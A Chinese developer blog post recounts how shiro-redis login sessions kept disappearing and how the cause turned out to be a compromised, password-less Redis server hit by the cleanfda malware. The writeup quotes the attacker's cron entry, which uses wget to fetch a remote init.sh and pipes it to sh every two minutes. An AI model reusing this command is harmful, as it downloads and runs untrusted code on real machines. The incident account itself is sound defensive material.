记一次shiro-redis无法记住登录状态的bug

最新推荐文章于 2022-08-27 04:37:16 发布
最新推荐文章于 2022-08-27 04:37:16 发布
阅读量296 收藏
点赞数
文章标签: shiro redis spring boot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MiZhiBug/article/details/119041098
版权

背景:项目使用shiro-redis管理登录状态,项目上线后,用户经常抱怨APP需要反复登录。
排查问题:项目中session的过期时间都是负数,也就是永不过期。这就很奇怪了。登录服务器查看redis缓存:

127.0.0.1:6379> keys shiro*

1) "shiro:session:1da60618-accf-404a-b426-a765b66aaa24"
2) "shiro:session:68b437d4-89e0-407c-98d8-2063a236cc39"
3) "shiro:session:fa10aca2-6715-43f5-acda-833420be3104"
4) "shiro:session:15df980b-d050-4739-afb2-562cd5a6d55a"
5) "shiro:session:d6121e42-658b-4033-a03d-ecd110bf7cb2"

127.0.0.1:6379> ttl shiro:session:d6121e42-658b-4033-a03d-ecd110bf7cb2
(integer) -1

缓存确实没有过期时间,但再次查看:

127.0.0.1:6379> keys shiro*

1) "shiro:session:1da60618-accf-404a-b426-a765b66aaa24"
2) "shiro:session:68b437d4-89e0-407c-98d8-2063a236cc39"

少了很多数据!

跳过排查过程,直接上结论吧:redis未设置最大内存,内存不足,触发了清理程序!
查看最大内存:

127.0.0.1:6379> config get maxmemory
1) "maxmemory"
2) "0"

解决方法:设置最大内存,在redis.conf中修改:

maxmemory 200M

问题似乎解决了,缓存键值达到300多个,而且重复查看不再减少。后续情况,有待观察。

306) "shiro:session:b5ddcb96-95dc-484c-95d5-c23df3eed07d"
307) "shiro:session:316c7708-4809-4ced-a4e3-afd90f28a8cc"
308) "shiro:session:ffdc27b6-bb3a-4d1e-aa85-96643d29c927"
309) "shiro:session:e5846833-fed4-483b-863b-3d68282f3bcf"
310) "shiro:session:8256ae36-79ad-4851-825b-8997ed314002"
311) "shiro:session:1d6825bb-cce2-4440-8706-5bb598b097c7"
312) "shiro:session:18099c33-ad1d-4704-b263-8c8d472496da"
313) "shiro:session:00d3fa95-43d5-4c28-aed5-cc4d59d0c31a"
314) "shiro:session:57126755-dabb-440d-8f6c-b536e3e29acf"
315) "shiro:session:d4f1a339-d29f-496a-b986-2bc69ade65e6"
316) "shiro:session:e982af81-2844-4737-a193-40474e971f36"
317) "shiro:session:1da60618-accf-404a-b426-a765b66aaa24"
318) "shiro:session:68b437d4-89e0-407c-98d8-2063a236cc39"
319) "shiro:session:fa10aca2-6715-43f5-acda-833420be3104"
320) "shiro:session:15df980b-d050-4739-afb2-562cd5a6d55a"
321) "shiro:session:d6121e42-658b-4033-a03d-ecd110bf7cb2"

————————我是分割线——————————————
果然事情没那么简单!事实证明,redis缓存超预期快速失效的原因是中毒了!执行:

keys *

发现很多"backup1","backup2"的文件。而且邮件系统提示我收到一封邮件——肯定不是招商银行信用卡的账单啦(黑一波招行信用卡,外包出去一个保险业务,三天两头打电话给我推保险,吐了,原以为这电话还算官方,也就没处理它,投诉了几波无果,直接拉黑了)。
查看邮件:

cat 邮件地址

(也可以用其他工具,我心急,没工夫去装了)
发现一溜下来几十封内容一模一样的邮件(内容是瀑布流一样显示的),提示我有一个定时任务没有执行权限,定时任务大概长这样(被我清了):

*/2 * * * * wget http://xxx.xxx.xxx.xxx/cleanfda/init.sh | sh

百度了一下cleanfda,好家伙:
cleanfda
结果很明显了嘛!
然后就杀毒呗。没有任何杀毒软件,纯靠手删。先删了定时任务,在/etc/下有一溜cron文件夹和文件,这是linux的定时任务文件。其他文件夹都是空的,只有crontab是个文件,且内容就是上面邮件里的那些东西,就是它了!
基本没什么问题了。然后我又找了一波backup,在/目录下发现两个文件夹,删了。之后把防火墙拉起给redis设置密码——这是关键!

朴老师
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SpringMVC-Mybatis-Shiro-redis-master 权限集成缓存中实例
11-17
本人提供这个Shiro + SpringMvc + Mybatis + Redis 的Demo 本着学习的态度,如果有欠缺和不足的地方,给予指正,并且多多包涵。 “去其糟粕取其精华”。如果觉得写的好的地方就给个赞,写的不好的地方,也请多多包涵...
SpringBoot+Shiro学习之数据库动态权限管理和Redis缓存
热门推荐
qq_20954959的博客
02-16 1万+
发现问题,需找解决思路。之前我们整合Shiro,完成了登录认证和权限管理的实现,登录认证没什么说的,需要实现AuthorizingRealm中的doGetAuthenticationInfo方法进行认证,但是我们在实现doGetAuthorizationInfo权限控制这个方法的时候发现以下两个问题: 第一个问题:我们在ShiroConfig中配置链接权限的时候,每次只要有一个新的链接,或则权限需要
一次shiro排错(会话无效)
来年三月
01-31 870
shiro一次bug排除 用户在登陆成功之后,访问项目主页会话无效提示需要再次登陆 菜鸡解决问题第一招 gooogle 1,shiro是如何进行会话验证的? 并没有查到有效的信息,大都数都是说分析Shiro的源码,并没有说明到底前端与服务器交互,是如何判断此次会话有效,(因为着急解决bug的心理,也没细看,就想找到直接答案).因为对于Web 服务sesseion理解不深刻, 并不知道J...
shiro获取当前登录用户subject.getPrincipal()报null空指针
iijik55的博客
08-24 2140
SecurityUtils.getSubject().getPrincipal()为空,网上查了一堆复制粘贴的文章都是说配置加载顺序问题,我遇到的并不是这样的问题,我是偶尔一个报空,其他的正常.既然是这个参数报空,那就找到代码的这里,发现原来代码的逻辑是从redis中拿,并且把如果redis没有就去查数据库的代码给注释掉了.恢复注释即可.自定义realm–》doGetAuthenticationInfo–》
解决shiro授权不能实时添加到角色里,不用重启服务器和重新登陆
weixin_43776241的博客
06-23 343
shiro修改了某个用户的权限,不能实时加载到subject中,正常只有每次登录会进行授权。下面有种方式可以解决: 自定义realm中添加 public void clearAuthz(){ this.clearCachedAuthorizationInfo(SecurityUtils.getSubject().getPrincipals()); } until中新建方法 /** * * @Title: clearAuth * @Description: TODO 清空所有资源权限
参考shiro session设置了过期时间不起作用、无效,出现Redis session expire time: xxxx is less than Session timeout:xxx
yarcl的程序之家
11-02 3426
在开发过程中出现Redis session expire time: xxxx is less than Session timeout:xxx这种问题,虽然不影响功能的使用,但是对于有洁癖的人来说还是有点受不了的。 可以参考如下的内容: https://blog.csdn.net/wangjun5159/article/details/89875746?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnP
权限管理系统:使用SpringBootWebFlux + Shiro + JPA + JavaScala,实现基于数据库细粒度动态权限管理系统
01-30
大师第一版 React器第二版 环境 SpringBoot 2.0.3。发布 SpringBoot WebFlux SpringBoot数据Jpa 阿帕克史郎 React堆 高速缓存 雷迪斯 自由标 功能 控制器初步 服务初步 Dao依赖于JDBC和ORM,暂未更改成初始 去除...
积分管理系统java源码-Anshare_SprintBoot_Web_Api:基于Springboot的一套webapi
06-06
1、项目整合redis存储,shiro可使用redisSession可使用于集群访问. 2、项目增加jwt模式 3、增加默认启动模式为开发模式 4、优化已知BUG SpringBootAdmin 微服务快速开发脚手架 平台简介 SpringBootAdmin是基于多个...
swallow:spring-boot管理系统开发的一个快速脚手架工程
05-14
RabbitMQ(如果没有会导致登录录功能无法使用) 后台: SpringMVC Mybatis Freemarker Shiro MybatisPlus RabbitMQ Druid FastJSON Redis Lombok Swagger EhCache activiti 前端: 整体:easyui和ace admin 文件上传...
积分管理系统java源码-tttd:天地
06-06
1、项目整合redis存储,shiro可使用redisSession可使用于集群访问 2、项目增加jwt模式 3、增加默认启动模式为开发模式 4、优化已知BUG SpringBootAdmin 微服务快速开发脚手架 平台简介 SpringBootAdmin是基于多个...
springboot+shiro+redis做缓存时导致@Cacheable失效,去掉redis配置类或者shiro配置类才生效
hydy的博客
12-10 311
解决思路是shiro和cache在引用service实例顺序问题,shiro引入应在cache后, shiro配置文件中引用realm属性bean中引用的service采用延迟加载策略。 @Autowired @Lazy private ServiceI service; //尽量所有引用的service都懒加载,因为可能别的未注释懒加载service中引用了懒加载的service,则也会立即加载 参考链接:https://segmentfault.com/q/101000000935204.
SpringMvc+Shiro有时候shiro取不到用户名
m0_67393827的博客
08-25 551
shiro里取username为null的时候,我发现filter里的request.getParameter(“username”);我自定义的过滤器要先shiro的Filter执行,但是我纳闷的是为什么Network明明有username和password的参数提交,我后台就是取不到呢?于是我就就看chrome的Network,发现当shiro取用户名为null的时候,Network里是传了值的,如下图。
Shiro登录之后获取用户信息
qq_37962402的博客
05-28 1594
问题:最近在学习Shiro,有点好奇Shiro如何获取用户信息的,正好测试登录之后,没有获取到用户的信息,正好直接了解下。 1.
shiroshiro+redis时提示no session id
sebeefe的博客
08-27 335
最近集成shiro+redis时遇到一个问题,调用登录接口一直提示no session id[******],查看了其他的说法,基本上是说JSESSIONID冲突。看来不是这里的问题。这里saveSession后sessionId是正常写到redis中,之后又调用了标的update方法,更新了一个id相同,expire=-1的session,这时redis中的sessionId居然消失了。这里.setGlobalSessionTimeout(-1),触发了update,进而删除了redis中的条目。...
springboot+shiro+redis运行时登录无反应
yjl23332的博客
02-11 549
在写项目中,我们需要用到shiro实现登录认证和授权,然后当我输入账号密码时,点击登录无任何反应,后来去问了下朋友,说是User没有实现序列化。 恩,这篇文章用来警醒自己,下次写项目时,要注意使用shiro的数据实体类要实现序列化implements Serializable ...
shiro 自定义拦截器继承AccessControllerFilter后无法获取用户登录信息
醋拌柠檬
04-05 1495
shiro自定义拦截器继承AccessControllerFilter,在ShiroConfig中加入到拦截器链中。 package com.lwp.website.shiro; import com.alibaba.fastjson.JSON; import com.lwp.website.entity.Vo.UserVo; import com.lwp.website.res.ResourceManage; import com.lwp.website.utils.RedisUtil; impor
解决shiro分布式session读取redis次数过多的问题
穷水叮咚的博客
09-12 2364
重写 DefaultWebSessionManager 的 retrieveSession()方法。在 Web 下使用 shiro 时这个 sessionKey 是 WebSessionKey 类型的,这个类有个我们很熟悉的属性:servletRequest。直接把 session 对象怼进 request 里去!那么在单次请求周期内我们都可以从 request 中取 session 了,而且请求...
springboot整合shiro-关于登出时,redis中缓存没有清理干净的问题
cristianoxm的博客
12-15 1342
原文地址,转载请注明出处: https://blog.csdn.net/qq_34021712/article/details/84722724 ©王赛超 如果是跟着我的shiro系列博客敲下来的,其实还有一个bug,这是一个网友遇到的,他在登出的时候,发现redis中当前用户身份认证缓存没有清理掉,之前在 springboot整合shiro-ehcache缓存(五) 中测试添加权限之后,清理的是所有用户的缓存,所以没有发现这个问题。 还得上一篇博客: springboot整合shiro-实现自己
shiro-redis-spring-boot-starter
最新发布
10-06
shiro-redis-spring-boot-starter是一个用于集成Apache ShiroRedisSpring Boot Starter项目。Apache Shiro是一个强大而灵活的Java安全框架,用于身份验证、授权和会话管理等安全功能。而Redis是一个高性能的内存...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值